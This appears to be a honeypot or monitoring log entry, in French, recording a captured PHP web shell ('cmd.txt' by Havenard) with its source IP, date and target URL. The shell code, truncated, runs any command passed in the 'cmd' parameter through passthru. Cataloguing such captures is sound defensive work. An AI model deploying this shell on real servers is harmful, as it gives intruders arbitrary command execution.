Script potentiellement dangereux sur anje-pt
IP de provenance : 201.0.6.28
Date de connexion : 20-03-2008 17:59:50
Site : http://www.anje.pt/cmd.txt?
Retour liste scripts
<!-- cmd.txt.2 with stderr-trapping for multiple plataforms - by Havenard -->
<table border="0" cellpadding="10" style="border: 1px solid black" width="100%" bgcolor="silver">
<tr>
<td nowrap align="left" width="100%" style="font-size: 8px; text-decoration: none; color: black"><pre><font face="fixedsys"><?php
$safe_mode = (bool)ini_get("safe_mode");
if (!$safe_mode) {
@ $cmd = $_GET["cmd"];
@ $chdir = $_GET["chdir"];
$cmd = stripslashes($cmd);
$chdir = stripslashes($chdir);
if (!empty($cmd)) {
if (isset($chdir)) @chdir($chdir);
ob_start();
if (!isset($OS) || ($OS != "Windows_NT"))
@passthru("$cmd 2>&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
[...]
Retour liste scripts